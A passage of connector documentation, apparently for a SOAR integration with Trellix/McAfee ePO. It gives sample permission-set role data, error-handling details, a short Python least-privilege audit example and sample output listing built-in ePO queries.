                    "roleUri": "role:epo.productevents.view"
                },
                {
                    "roleUri": "role:scheduler.view"
                },
                {
                    "roleUri": "role:epo.event.view"
                },
                {
                    "roleUri": "role:notes.viewOnly"
                },
                {
                    "roleUri": "role:core.query.guest"
                },
                {
                    "roleUri": "role:epo.core.view.tree"
                },
                {
                    "roleUri": "role:response.rule.user"
                }
            ]
        }
    },
    {
        "@id": "4",
        "name": "Executive Reviewer",
        "roles": {
            "role": [
                {
                    "roleUri": "role:epo.productevents.view"
                },
                {
                    "roleUri": "role:core.query.guest"
                },
                {
                    "roleUri": "role:epo.dir.access",
                    "customRoleInfo": {
                        "@roleFactoryId": "epo.dir",
                        "systems": {
                            "system": "\\"
                        }
                    }
                },
                {
                    "roleUri": "role:core.dash.viewer"
                },
                {
                    "roleUri": "role:core.addressbook.guest"
                },
                {
                    "roleUri": "role:epo.event.view"
                }
            ]
        }
    },
    {
        "@id": "5",
        "name": "MCP Catalog Admin",
        "roles": {
            "role": [
                {
                    "roleUri": "role:common.catalog.data.general?catalogId=69c1e34e-ede8-43ae-95b0-e731d177cdab&itemTypeId8=perm.EDIT&itemTypeId102=perm.EDIT&itemTypeId201=perm.EDIT&itemTypeId20=perm.EDIT"
                },
                {
                    "roleUri": "role:common.catalog.data.general?catalogId=00000000-0000-0000-0000-000000000000&itemTypeId8=perm.EDIT&itemTypeId102=perm.EDIT&itemTypeId201=perm.EDIT&itemTypeId20=perm.EDIT"
                },
                {
                    "roleUri": "role:common.catalog.actions.general?exportFile=&importFromCatalog=&createCatalog=&deleteCatalog=&importFromFile="
                },
                {
                    "roleUri": "role:MCPSRVER1000.MCPSRVER1000.admin"
                }
            ]
        }
    },
    {
        "@id": "6",
        "name": "Group Active Response Editor",
        "roles": {
            "role": [
                {
                    "roleUri": "role:mar-server.reactionRole.write"
                },
                {
                    "roleUri": "role:mar-server.searchRole.write"
                },
                {
                    "roleUri": "role:MARCOBA_META.MARCOBA_META.admin"
                },
                {
                    "roleUri": "role:mar-server.collectorRole.write"
                },
                {
                    "roleUri": "role:epo.event.view"
                },
                {
                    "roleUri": "role:mar-server.triggerRole.write"
                }
            ]
        }
    },
    {
        "@id": "7",
        "name": "Group Active Response Responder",
        "roles": {
            "role": [
                {
                    "roleUri": "role:mar-server.searchRole.write"
                },
                {
                    "roleUri": "role:MARCOBA_META.MARCOBA_META.reviewer"
                },
                {
                    "roleUri": "role:mar-server.triggerRole.read"
                },
                {
                    "roleUri": "role:epo.event.view"
                },
                {
                    "roleUri": "role:mar-server.reactionRole.read"
                },
                {
                    "roleUri": "role:mar-server.collectorRole.read"
                }
            ]
        }
    },
    {
        "@id": "8",
        "name": "Group Active Response Workspace Monitor",
        "roles": {
            "role": [
                {
                    "roleUri": "role:mar-server.searchRole.read"
                },
                {
                    "roleUri": "role:mar-workspace.workspace.read"
                },
                {
                    "roleUri": "role:mar-server.collectorRole.read"
                },
                {
                    "roleUri": "role:tie.viewer"
                }
            ]
        }
    },
    {
        "@id": "9",
        "name": "Group Active Response Workspace Responder",
        "roles": {
            "role": [
                {
                    "roleUri": "role:mar-server.triggerRole.write"
                },
                {
                    "roleUri": "role:mar-server.reactionRole.run"
                },
                {
                    "roleUri": "role:mar-server.searchRole.write"
                },
                {
                    "roleUri": "role:mar-server.collectorRole.write"
                },
                {
                    "roleUri": "role:tie.manager"
                },
                {
                    "roleUri": "role:mar-workspace.workspace.write"
                },
                {
                    "roleUri": "role:mar-server.reactionRole.write"
                }
            ]
        }
    },
    {
        "@id": "10",
        "name": "Group MVISION EDR FW",
        "roles": {
            "role": {
                "roleUri": "role:copperfieldFw.write"
            }
        }
    },
    {
        "@id": "11",
        "name": "Group Admin",
        "roles": {
            "role": [
                {
                    "roleUri": "role:udlp.helpDesk.actions.agentOverrideKey.creator"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.operational.reviewer.full"
                },
                {
                    "roleUri": "role:udlp.helpDesk.actions.agentUninstallKey.creator"
                },
                {
                    "roleUri": "role:core.addressbook.admin"
                },
                {
                    "roleUri": "role:core.dash.user"
                },
                {
                    "roleUri": "role:epo.core.modify.tree"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.policy.list?masterPerm=VIEW"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.incident.task?email=true&purge=true&setReviewer=true"
                },
                {
                    "roleUri": "role:epo.productevents.view"
                },
                {
                    "roleUri": "role:scheduler.view"
                },
                {
                    "roleUri": "role:epo.core.deploy.agent"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.ruleSet.list?masterPerm=FULL"
                },
                {
                    "roleUri": "role:epo.event.view"
                },
                {
                    "roleUri": "role:notes.overRide"
                },
                {
                    "roleUri": "role:epo.core.tagcat.user"
                },
                {
                    "roleUri": "role:ubpRole.viewOnly"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.definition.list?itemTypeId80=perm.FULL&itemTypeId81=perm.FULL&itemTypeId9=perm.FULL&itemTypeId82=perm.FULL&itemTypeId8=perm.FULL&itemTypeId83=perm.FULL&itemTypeId84=perm.FULL&itemTypeId85=perm.FULL&itemTypeId20=perm.FULL&itemTypeId86=perm.FULL&itemTypeId1000=perm.FULL&itemTypeId21=perm.FULL&itemTypeId87=perm.FULL&itemTypeId88=perm.FULL&itemTypeId23=perm.FULL&itemTypeId24=perm.FULL&itemTypeId26=perm.FULL&catalogId=d3ab4ed4-efab-48d2-840d-714cbf76b888&itemTypeId3=perm.FULL&itemTypeId2=perm.FULL&itemTypeId1=perm.FULL&itemTypeId0=perm.FULL&itemTypeId6=perm.FULL&itemTypeId5=perm.FULL&itemTypeId4=perm.FULL&itemTypeId90=perm.FULL&itemTypeId91=perm.FULL&itemTypeId92=perm.FULL&itemTypeId93=perm.FULL&itemTypeId94=perm.FULL&itemTypeId10=perm.FULL&itemTypeId2000=perm.FULL&itemTypeId11=perm.FULL&itemTypeId12=perm.FULL&itemTypeId103=perm.FULL&itemTypeId79=perm.FULL&itemTypeId15=perm.FULL&itemTypeId100=perm.FULL&itemTypeId16=perm.FULL&itemTypeId17=perm.FULL&itemTypeId102=perm.FULL&itemTypeId101=perm.FULL"
                },
                {
                    "roleUri": "role:ahRole.viewOnly"
                },
                {
                    "roleUri": "role:repoRole.distViewOnly"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.incident.reviewer.full?skyhigh=true"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.operational.task?email=true&purge=true&setReviewer=true"
                },
                {
                    "roleUri": "role:repoRole.masterViewOnly"
                },
                {
                    "roleUri": "role:epo.core.view.tree"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.incident.redaction?view=true&reveal=true"
                },
                {
                    "roleUri": "role:epo.event.admin"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.discover.main.full"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.case.reviewer.full"
                },
                {
                    "roleUri": "role:response.rule.admin"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.capture.main.full"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.incident.evidence?viewFile=true&viewMatch=true"
                },
                {
                    "roleUri": "role:udlp.helpDesk.actions.agentReleaseFromQuarantineKey.creator"
                },
                {
                    "roleUri": "role:udlp.helpDesk.actions.masterReleaseKey.creator"
                },
                {
                    "roleUri": "role:notes.fullPerms"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.classification.action?regDocsAndWhitelist=true&manualClassification=true"
                },
                {
                    "roleUri": "role:core.audit.reviewer"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.incident.type?endpointDiscovery=true&data=true&device=true&discovery=true&skyhigh=true"
                },
                {
                    "roleUri": "role:epo.core.wakeup.agent"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.classification.list?masterPerm=FULL"
                },
                {
                    "roleUri": "role:epo.core.tag.assign"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.dlp.settings?advancedTab=true&skyhighTab=true&caseTab=true&backupRestoreTab=true&generalTab=true&incidentTab=true&operationalTab=true"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.rule.type.full?data=true&device=true&discovery=true"
                },
                {
                    "roleUri": "role:core.query.user"
                }
            ]
        }
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
No Sample Data
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

@ID

NAME

ROLES

2

Global Reviewer

{
"role": [
{
"roleUri": "role:ENDP_FW_META.ENDP_FW_META_FW.reviewer"
},
{
"roleUri": "role:EPOAGENTMETA.tasks.reviewer"
},
{
"roleUri": "role:MVEDR___META.MVEDR___META.reviewer"
},
{
"roleUri": "role:epo.core.view.tree"
},
{
"roleUri": "role:core.dash.viewer"
},
{
"roleUri": "role:MARCOBA_META.MARCOBA_META.reviewer"
},
{
"roleUri": "role:MVEDR___META.tasks.reviewer"
},
{
"roleUri": "role:issue.auditor?type=issue.type.untyped"
},
{
"roleUri": "role:TIEMGMT_META.TIEMGMT_META.reviewer"
},
{
"roleUri": "role:MARCOBA_META.tasks.reviewer"
},
{
"roleUri": "role:DXLCLNT_META.DXLCLNT_META.reviewer"
},
{
"roleUri": "role:softman.viewOnly"
},
{
"roleUri": "role:ENDP_WP_1000.tasks.reviewer"
},
{
"roleUri": "role:ENDP_GS_1000.ENDP_GS_1000.reviewer"
},
{
"roleUri": "role:epo.dir.access",
"customRoleInfo": {
"@roleFactoryId": "epo.dir",
"systems": {
"system": "\\"
}
}
},
{
"roleUri": "role:ENDP_AM_1000.tasks.reviewer"
},
{
"roleUri": "role:response.rule.user"
},
{
"roleUri": "role:EPOAGENTMETA.EPOAGENTMETA.reviewer"
},
{
"roleUri": "role:ahRole.viewOnly"
},
{
"roleUri": "role:rs.user"
},
{
"roleUri": "role:core.audit.reviewer"
},
{
"roleUri": "role:DXLBROKRMETA.DXLBROKRMETA.reviewer"
},
{
"roleUri": "role:core.query.guest"
},
{
"roleUri": "role:ENDP_AM_1000.ENDP_AM_1000.reviewer"
},
{
"roleUri": "role:TIEClientMETA.TIEClientMETA.reviewer"
},
{
"roleUri": "role:rollup.execute"
},
{
"roleUri": "role:UDLPSRVR2013.UDLPSRVR2013.reviewer"
},
{
"roleUri": "role:core.addressbook.guest"
},
{
"roleUri": "role:MCPSRVER1000.MCPSRVER1000.reviewer"
},
{
"roleUri": "role:ENDP_WP_1000.ENDP_WP_1000.reviewer"
},
{
"roleUri": "role:epo.productevents.view"
},
{
"roleUri": "role:ubpRole.viewOnly"
},
{
"roleUri": "role:repoRole.distViewOnly"
},
{
"roleUri": "role:epo.event.view"
},
{
"roleUri": "role:notes.viewOnly"
},
{
"roleUri": "role:scheduler.view"
},
{
"roleUri": "role:repoRole.masterViewOnly"
},
{
"roleUri": "role:ENDP_GS_1000.tasks.reviewer"
}
]
}

3

Group Reviewer

{
"role": [
{
"roleUri": "role:core.addressbook.guest"
},
{
"roleUri": "role:core.dash.viewer"
},
{
"roleUri": "role:epo.productevents.view"
},
{
"roleUri": "role:scheduler.view"
},
{
"roleUri": "role:epo.event.view"
},
{
"roleUri": "role:notes.viewOnly"
},
{
"roleUri": "role:core.query.guest"
},
{
"roleUri": "role:epo.core.view.tree"
},
{
"roleUri": "role:response.rule.user"
}
]
}

4

Executive Reviewer

{
"role": [
{
"roleUri": "role:epo.productevents.view"
},
{
"roleUri": "role:core.query.guest"
},
{
"roleUri": "role:epo.dir.access",
"customRoleInfo": {
"@roleFactoryId": "epo.dir",
"systems": {
"system": "\\"
}
}
},
{
"roleUri": "role:core.dash.viewer"
},
{
"roleUri": "role:core.addressbook.guest"
},
{
"roleUri": "role:epo.event.view"
}
]
}

5

MCP Catalog Admin

{
"role": [
{
"roleUri": "role:common.catalog.data.general?catalogId=******&itemTypeId8=perm.EDIT&itemTypeId102=perm.EDIT&itemTypeId201=perm.EDIT&itemTypeId20=perm.EDIT"
},
{
"roleUri": "role:common.catalog.data.general?catalogId=00000000-0000-0000-0000-000000000000&itemTypeId8=perm.EDIT&itemTypeId102=perm.EDIT&itemTypeId201=perm.EDIT&itemTypeId20=perm.EDIT"
},
{
"roleUri": "role:common.catalog.actions.general?exportFile=&importFromCatalog=&createCatalog=&deleteCatalog=&importFromFile="
},
{
"roleUri": "role:MCPSRVER1000.MCPSRVER1000.admin"
}
]
}

6

Group Active Response Editor

{
"role": [
{
"roleUri": "role:mar-server.reactionRole.write"
},
{
"roleUri": "role:mar-server.searchRole.write"
},
{
"roleUri": "role:MARCOBA_META.MARCOBA_META.admin"
},
{
"roleUri": "role:mar-server.collectorRole.write"
},
{
"roleUri": "role:epo.event.view"
},
{
"roleUri": "role:mar-server.triggerRole.write"
}
]
}

7

Group Active Response Responder

{
"role": [
{
"roleUri": "role:mar-server.searchRole.write"
},
{
"roleUri": "role:MARCOBA_META.MARCOBA_META.reviewer"
},
{
"roleUri": "role:mar-server.triggerRole.read"
},
{
"roleUri": "role:epo.event.view"
},
{
"roleUri": "role:mar-server.reactionRole.read"
},
{
"roleUri": "role:mar-server.collectorRole.read"
}
]
}

8

Group Active Response Workspace Monitor

{
"role": [
{
"roleUri": "role:mar-server.searchRole.read"
},
{
"roleUri": "role:mar-workspace.workspace.read"
},
{
"roleUri": "role:mar-server.collectorRole.read"
},
{
"roleUri": "role:tie.viewer"
}
]
}

9

Group Active Response Workspace Responder

{
"role": [
{
"roleUri": "role:mar-server.triggerRole.write"
},
{
"roleUri": "role:mar-server.reactionRole.run"
},
{
"roleUri": "role:mar-server.searchRole.write"
},
{
"roleUri": "role:mar-server.collectorRole.write"
},
{
"roleUri": "role:tie.manager"
},
{
"roleUri": "role:mar-workspace.workspace.write"
},
{
"roleUri": "role:mar-server.reactionRole.write"
}
]
}

10

Group MVISION EDR FW

{
"role": {
"roleUri": "role:copperfieldFw.write"
}
}

11

Group Admin

{
"role": [
{
"roleUri": "role:udlp.helpDesk.actions.agentOverrideKey.creator"
},
{
"roleUri": "role:UDLPSRVR2013.operational.reviewer.full"
},
{
"roleUri": "role:udlp.helpDesk.actions.agentUninstallKey.creator"
},
{
"roleUri": "role:core.addressbook.admin"
},
{
"roleUri": "role:core.dash.user"
},
{
"roleUri": "role:epo.core.modify.tree"
},
{
"roleUri": "role:UDLPSRVR2013.policy.list?masterPerm=VIEW"
},
{
"roleUri": "role:UDLPSRVR2013.incident.task?email=true&purge=true&setReviewer=true"
},
{
"roleUri": "role:epo.productevents.view"
},
{
"roleUri": "role:scheduler.view"
},
{
"roleUri": "role:epo.core.deploy.agent"
},
{
"roleUri": "role:UDLPSRVR2013.ruleSet.list?masterPerm=FULL"
},
{
"roleUri": "role:epo.event.view"
},
{
"roleUri": "role:notes.overRide"
},
{
"roleUri": "role:epo.core.tagcat.user"
},
{
"roleUri": "role:ubpRole.viewOnly"
},
{
"roleUri": "role:UDLPSRVR2013.definition.list?itemTypeId80=perm.FULL&itemTypeId81=perm.FULL&itemTypeId9=perm.FULL&itemTypeId82=perm.FULL&itemTypeId8=perm.FULL&itemTypeId83=perm.FULL&itemTypeId84=perm.FULL&itemTypeId85=perm.FULL&itemTypeId20=perm.FULL&itemTypeId86=perm.FULL&itemTypeId1000=perm.FULL&itemTypeId21=perm.FULL&itemTypeId87=perm.FULL&itemTypeId88=perm.FULL&itemTypeId23=perm.FULL&itemTypeId24=perm.FULL&itemTypeId26=perm.FULL&catalogId=d3ab4ed4-efab-48d2-840d-714cbf76b888&itemTypeId3=perm.FULL&itemTypeId2=perm.FULL&itemTypeId1=perm.FULL&itemTypeId0=perm.FULL&itemTypeId6=perm.FULL&itemTypeId5=perm.FULL&itemTypeId4=perm.FULL&itemTypeId90=perm.FULL&itemTypeId91=perm.FULL&itemTypeId92=perm.FULL&itemTypeId93=perm.FULL&itemTypeId94=perm.FULL&itemTypeId10=perm.FULL&itemTypeId2000=perm.FULL&itemTypeId11=perm.FULL&itemTypeId12=perm.FULL&itemTypeId103=perm.FULL&itemTypeId79=perm.FULL&itemTypeId15=perm.FULL&itemTypeId100=perm.FULL&itemTypeId16=perm.FULL&itemTypeId17=perm.FULL&itemTypeId102=perm.FULL&itemTypeId101=perm.FULL"
},
{
"roleUri": "role:ahRole.viewOnly"
},
{
"roleUri": "role:repoRole.distViewOnly"
},
{
"roleUri": "role:UDLPSRVR2013.incident.reviewer.full?skyhigh=true"
},
{
"roleUri": "role:UDLPSRVR2013.operational.task?email=true&purge=true&setReviewer=true"
},
{
"roleUri": "role:repoRole.masterViewOnly"
},
{
"roleUri": "role:epo.core.view.tree"
},
{
"roleUri": "role:UDLPSRVR2013.incident.redaction?view=true&reveal=true"
},
{
"roleUri": "role:epo.event.admin"
},
{
"roleUri": "role:UDLPSRVR2013.discover.main.full"
},
{
"roleUri": "role:UDLPSRVR2013.case.reviewer.full"
},
{
"roleUri": "role:response.rule.admin"
},
{
"roleUri": "role:UDLPSRVR2013.capture.main.full"
},
{
"roleUri": "role:UDLPSRVR2013.incident.evidence?viewFile=true&viewMatch=true"
},
{
"roleUri": "role:udlp.helpDesk.actions.agentReleaseFromQuarantineKey.creator"
},
{
"roleUri": "role:udlp.helpDesk.actions.masterReleaseKey.creator"
},
{
"roleUri": "role:notes.fullPerms"
},
{
"roleUri": "role:UDLPSRVR2013.classification.action?regDocsAndWhitelist=true&manualClassification=true"
},
{
"roleUri": "role:core.audit.reviewer"
},
{
"roleUri": "role:UDLPSRVR2013.incident.type?endpointDiscovery=true&data=true&device=true&discovery=true&skyhigh=true"
},
{
"roleUri": "role:epo.core.wakeup.agent"
},
{
"roleUri": "role:UDLPSRVR2013.classification.list?masterPerm=FULL"
},
{
"roleUri": "role:epo.core.tag.assign"
},
{
"roleUri": "role:UDLPSRVR2013.dlp.settings?advancedTab=true&skyhighTab=true&caseTab=true&backupRestoreTab=true&generalTab=true&incidentTab=true&operationalTab=true"
},
{
"roleUri": "role:UDLPSRVR2013.rule.type.full?data=true&device=true&discovery=true"
},
{
"roleUri": "role:core.query.user"
}
]
}


Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

List Permission Set failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

List Permission Set failed.

Status Code: 401.

Message: Unauthorized.
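
The List Permission Set Raw Data can be reviewed for least privilege before a connection account is assigned a permission set. The following is an added example, not part of the D3 or Trellix documentation: it normalizes roles.role, which the sample data returns as a single object when a set holds one role (id 10) and as an array otherwise, splits each roleUri into a name and its parameters, and lists the roles that look elevated. The function names and the elevated-role markers are assumptions read off the naming in the sample data, not a documented ePO permission model.

```python
import json
from urllib.parse import parse_qsl

# Excerpt of the List Permission Set sample data shown on this page
# (ids 5, 8 and 10; the first roleUri is trimmed), embedded so this runs offline.
SAMPLE_RAW_DATA = json.loads(r"""
[
  {"@id": "5", "name": "MCP Catalog Admin", "roles": {"role": [
    {"roleUri": "role:common.catalog.data.general?catalogId=00000000-0000-0000-0000-000000000000&itemTypeId8=perm.EDIT&itemTypeId20=perm.EDIT"},
    {"roleUri": "role:common.catalog.actions.general?exportFile=&importFromCatalog=&createCatalog=&deleteCatalog=&importFromFile="},
    {"roleUri": "role:MCPSRVER1000.MCPSRVER1000.admin"}
  ]}},
  {"@id": "8", "name": "Group Active Response Workspace Monitor", "roles": {"role": [
    {"roleUri": "role:mar-server.searchRole.read"},
    {"roleUri": "role:mar-workspace.workspace.read"},
    {"roleUri": "role:mar-server.collectorRole.read"},
    {"roleUri": "role:tie.viewer"}
  ]}},
  {"@id": "10", "name": "Group MVISION EDR FW", "roles": {"role":
    {"roleUri": "role:copperfieldFw.write"}
  }}
]
""")

# Assumption: a naming heuristic taken from the sample data above, not a
# documented ePO permission model. Adjust both sets for your environment.
ELEVATED_SUFFIXES = {"admin", "write", "run", "manager", "full", "creator"}
ELEVATED_PARAM_VALUES = {"perm.FULL", "perm.EDIT", "FULL"}


def iter_roles(permission_set):
    """Yield role dicts whether 'role' is a single object or an array."""
    role = (permission_set.get("roles") or {}).get("role")
    if role is None:
        return
    if isinstance(role, dict):  # single-role sets are not wrapped in a list
        role = [role]
    yield from role


def parse_role_uri(role_uri):
    """Split 'role:<name>?k=v&...' into (name, {k: v}), keeping blank values."""
    body = role_uri[len("role:"):] if role_uri.startswith("role:") else role_uri
    name, _, query = body.partition("?")
    return name, dict(parse_qsl(query, keep_blank_values=True))


def is_elevated(name, params):
    """True if the last name segment or any parameter value matches a marker."""
    if name.rsplit(".", 1)[-1].lower() in ELEVATED_SUFFIXES:
        return True
    return any(value in ELEVATED_PARAM_VALUES for value in params.values())


def audit(permission_sets):
    """Map each permission set name to a sorted list of elevated role names."""
    report = {}
    for permission_set in permission_sets:
        elevated = set()
        for role in iter_roles(permission_set):
            name, params = parse_role_uri(role.get("roleUri", ""))
            if is_elevated(name, params):
                elevated.add(name)
        report[permission_set["name"]] = sorted(elevated)
    return report


if __name__ == "__main__":
    for set_name, elevated_roles in audit(SAMPLE_RAW_DATA).items():
        print(f"{set_name}: {elevated_roles or 'no elevated roles matched'}")
```
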

List Query

Retrieves a list of all queries.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "id": 1,
        "name": "Effective permissions for users",
        "description": "Shows all permissions for each user",
        "conditionSexp": "Permission Does not equal \"%%NOEPOROLES%%\"",
        "groupName": "Permissions",
        "userName": "Public",
        "databaseType": "",
        "target": "EntitlementView",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:00:39-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:00:39-08:00"
    },
    {
        "id": 2,
        "name": "Permission set details",
        "description": "Shows the permissions associated with each permission set",
        "conditionSexp": "",
        "groupName": "Permissions",
        "userName": "Public",
        "databaseType": "",
        "target": "EntitlementView",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:00:41-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:00:41-08:00"
    },
    {
        "id": 3,
        "name": "Permission set membership",
        "description": "Shows the permission sets associated with each principal",
        "conditionSexp": "",
        "groupName": "Permissions",
        "userName": "Public",
        "databaseType": "",
        "target": "EntitlementView",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:00:41-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:00:41-08:00"
    },
    {
        "id": 4,
        "name": "Failed User Actions in ePO Console within Last 30 Days",
        "description": "Displays a table of all failed actions within the last 30 days from the Audit Log.",
        "conditionSexp": "(Success Equals False and Start Time Is within the last 1 Months)",
        "groupName": "User Auditing",
        "userName": "Public",
        "databaseType": "",
        "target": "OrionAuditLog",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:04:19-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:04:19-08:00"
    },
    {
        "id": 5,
        "name": "Today's Detections per Product",
        "description": "Displays a pie chart of detections within the last 24 hours organized by detecting product.",
        "conditionSexp": "(Event Generated Time Is within the last 1 Days and Event Category Does not belong to Operational)",
        "groupName": "Detections and Compliance",
        "userName": "Public",
        "databaseType": "",
        "target": "EPOEvents",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:04:19-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:04:19-08:00"
    },
    {
        "id": 6,
        "name": "Systems per Top-Level Group",
        "description": "Displays a bar chart of your managed systems organized by top-level System Tree group.",
        "conditionSexp": "Managed State Equals Managed",
        "groupName": "System Management",
        "userName": "Public",
        "databaseType": "",
        "target": "EPOLeafNode",
        "createdBy": "admin",
        "createdOn": "2019-05-23T20:54:41-07:00",
        "modifiedBy": "admin",
        "modifiedOn": "2019-05-23T20:54:41-07:00"
    },
    {
        "id": 7,
        "name": "Duplicate Systems Names",
        "description": "Lists all system names that appear in multiple System Tree locations.",
        "conditionSexp": "System Name Is duplicated ",
        "groupName": "System Management",
        "userName": "Public",
        "databaseType": "",
        "target": "EPOLeafNode",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:04:20-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:04:20-08:00"
    },
    {
        "id": 8,
        "name": "McAfee Agent Compliance Summary",
        "description": "Displays a Boolean pie chart of managed systems in your environment which are compliant or noncompliant by version of McAfee Agent.",
        "conditionSexp": "Last Communication Is within the last 1 Days",
        "groupName": "Detections and Compliance",
        "userName": "Public",
        "databaseType": "",
        "target": "EPOLeafNode",
        "createdBy": "admin",
        "createdOn": "2019-05-23T20:54:40-07:00",
        "modifiedBy": "admin",
        "modifiedOn": "2019-05-23T20:54:40-07:00"
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "id": 1,
        "name": "Effective permissions for users",
        "description": "Shows all permissions for each user",
        "conditionSexp": "Permission Does not equal \"%%NOEPOROLES%%\"",
        "groupName": "Permissions",
        "userName": "Public",
        "databaseType": "",
        "target": "EntitlementView",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:00:39-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:00:39-08:00"
    },
    {
        "id": 2,
        "name": "Permission set details",
        "description": "Shows the permissions associated with each permission set",
        "conditionSexp": "",
        "groupName": "Permissions",
        "userName": "Public",
        "databaseType": "",
        "target": "EntitlementView",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:00:41-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:00:41-08:00"
    },
    {
        "id": 3,
        "name": "Permission set membership",
        "description": "Shows the permission sets associated with each principal",
        "conditionSexp": "",
        "groupName": "Permissions",
        "userName": "Public",
        "databaseType": "",
        "target": "EntitlementView",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:00:41-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:00:41-08:00"
    },
    {
        "id": 4,
        "name": "Failed User Actions in ePO Console within Last 30 Days",
        "description": "Displays a table of all failed actions within the last 30 days from the Audit Log.",
        "conditionSexp": "(Success Equals False and Start Time Is within the last 1 Months)",
        "groupName": "User Auditing",
        "userName": "Public",
        "databaseType": "",
        "target": "OrionAuditLog",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:04:19-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:04:19-08:00"
    },
    {
        "id": 5,
        "name": "Today's Detections per Product",
        "description": "Displays a pie chart of detections within the last 24 hours organized by detecting product.",
        "conditionSexp": "(Event Generated Time Is within the last 1 Days and Event Category Does not belong to Operational)",
        "groupName": "Detections and Compliance",
        "userName": "Public",
        "databaseType": "",
        "target": "EPOEvents",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:04:19-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:04:19-08:00"
    },
    {
        "id": 6,
        "name": "Systems per Top-Level Group",
        "description": "Displays a bar chart of your managed systems organized by top-level System Tree group.",
        "conditionSexp": "Managed State Equals Managed",
        "groupName": "System Management",
        "userName": "Public",
        "databaseType": "",
        "target": "EPOLeafNode",
        "createdBy": "admin",
        "createdOn": "2019-05-23T20:54:41-07:00",
        "modifiedBy": "admin",
        "modifiedOn": "2019-05-23T20:54:41-07:00"
    },
    {
        "id": 7,
        "name": "Duplicate Systems Names",
        "description": "Lists all system names that appear in multiple System Tree locations.",
        "conditionSexp": "System Name Is duplicated ",
        "groupName": "System Management",
        "userName": "Public",
        "databaseType": "",
        "target": "EPOLeafNode",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:04:20-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:04:20-08:00"
    },
    {
        "id": 8,
        "name": "McAfee Agent Compliance Summary",
        "description": "Displays a Boolean pie chart of managed systems in your environment which are compliant or noncompliant by version of McAfee Agent.",
        "conditionSexp": "Last Communication Is within the last 1 Days",
        "groupName": "Detections and Compliance",
        "userName": "Public",
        "databaseType": "",
        "target": "EPOLeafNode",
        "createdBy": "admin",
        "createdOn": "2019-05-23T20:54:40-07:00",
        "modifiedBy": "admin",
        "modifiedOn": "2019-05-23T20:54:40-07:00"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
